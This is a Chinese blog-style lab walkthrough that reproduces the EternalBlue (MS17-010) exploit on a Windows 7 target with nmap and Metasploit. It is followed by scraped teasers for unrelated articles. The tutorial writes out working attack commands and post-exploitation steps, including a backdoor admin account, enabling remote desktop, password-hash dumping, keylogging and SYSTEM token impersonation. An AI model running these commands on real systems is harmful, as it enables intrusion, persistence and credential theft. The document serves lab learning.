Win7经典漏洞永恒之蓝复现

news/2025/1/31 4:29:47/

Win7经典漏洞永恒之蓝复现

  • 环境
    • 信息收集
    • 确定漏洞
    • 渗透
    • 渗透成功后一些常用操作

环境

工具:metaspoilt

模拟攻击机ip:192.168.2.19

靶机ip:192.168.2.22

信息收集

扫描靶机端口及端口服务版本

nmap -sV 192.168.2.22

在这里插入图片描述445端口开启且版本信息已经显示时windows7版本,永恒之蓝漏洞特征已非常明显

确定漏洞

启动metaspoilt
在这里插入图片描述搜索ms17-010

search ms17-010

在这里插入图片描述
exploit/windows/smb/ms17_010_eternalblue 为攻击模块

auxiliary/scanner/smb/smb_ms17_010 为辅助模块可以扫描目标是否存在永恒之蓝漏洞

进行漏洞扫描

use auxiliary/scanner/smb/smb_ms17_010

查看参数

show options

![在这里插入在这里插入图片描述
RHOSTS参数是必填项,参数为目标ip

set RHOSTS 192.168.2.22

运行

exploit

在这里插入图片描述运行结果

在这里插入图片描述确定有永恒之蓝漏洞

渗透

使用ms17-010攻击模块

use exploit/windows/smb/ms17_010_eternalblue

查看参数

show options

在这里插入图片描述主要参数有

RHOSTS:目标主机ip

LHOST:攻击者ip (程序检测到网卡的ip已自动填写)

LPORT:攻击接收端口(默认为4444,可根据需要更改)

set RHOSTS 192.168.2.22

开始渗透

exploit

在这里插入图片描述渗透成功

渗透成功后一些常用操作

通过Shell对靶机Win7进行控制
创建用户名密码
net user hack 123456 /add
将用户hack添加入管理组
net localgroup administrators hack /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面连接Win7
rdesktop 192.168.2.22

shell交互显示乱码是因为编码不同

chcp 65001

修改编码可解决

获取到session后的常用命令:

help #获取所有可用命令

getuid #获取当前权限

screenshot #截屏

hashdump #获取密码的hash

ps #获取进程列表

sysinfo #获取系统信息

route #获取路由表

getpid #获取当前攻入的进程pid

migrate #将当前后门注入迁移到其他程序

keyscan_start # 开启键盘记录

keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe

download/upload #上传下载文件

keyscan_stop # 监视键盘记录

bg # 回到metasploit界面

令牌操纵
use incognito #heip incognito 查看帮助

list_tokens -u 查看可用的token

impersonate_token “伪造的身份” #假冒token 或者

举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用
execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell


http://www.ppmy.cn/news/570274.html

相关文章

永恒之蓝 ms17_010漏洞

复现环境: 攻击机:Linux kali(192.168.119.128) 靶机:Windows 7 x64(192.168.119.129) 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启…

本周大新闻|visionOS SDK开放下载;Meta和三星停止芯片合作

本周XR大新闻,AR方面,visionOS 1.0系统和SDK发布;Meta和三星停止芯片合作,转而投向联发科;Karl Guttag评Vision Pro第二篇发布;Vision Pro眼球追踪细节。 VR方面,Vision Pro游戏空间边界为3米圆…

应对流量损耗:提升APP广告变现效果的关键策略!

​引言: 在APP广告变现的过程中,流量损耗是一个常见的问题,它不可避免地会发生。尽管开发者可以在合理的范围内承受这种损耗,但如果出现大范围的损耗,那就意味着在广告变现过程中出现了一些问题,限制了开发…

python int转为float

train train.astype(float)

Python的整型数据类型

1. 整型 整型其实就是十进制整数的统称,比如: 1、68、999都属于整型。他一般用于表示年龄、序号等。 1.1 定义 number 10 age 181.2 独有功能 无 v1 5 #调用v1 (int)的独有功能,获取v1的二进制表示 resultv1.bit_length() print(result)v2 10 #调用v2 (int)的…

上海小天鹅洗衣机维修:小天鹅洗衣机使用注意事项

洗衣机基本已经普及到各家各户了,我们在使用洗衣机时没也应该注意一些洗衣机的清洁事项,以免污染我们的衣物,给自己皮肤带来不适。使用洗衣机要注意以下清洁事项。 1、存放在对比通风枯燥的地方,洗衣机禁止放在存放在卫生间。 2、…

【数据结构与算法C++实现】2、二分查找

原视频为左程云的B站教学 1 在有序数组中查找特定元素 基本思想是通过比较中间元素与目标元素的大小关系,将查找范围缩小一半,直到找到目标元素或查找范围为空为止。 时间复杂度O(logN) 因为比如说数组个数为N16, 最差的情况要分 4 次 ( [ 8 ∣ 8 ] →…

arraylist,hashmap和hashset常用方法

ArrayList常用方法: add(E element): 将元素添加到ArrayList的末尾。add(int index, E element): 在指定位置插入元素。get(int index): 获取指定位置的元素。set(int index, E element): 替换指定位置的元素。remove(int index): 移除指定位置的元素。remove(Obje…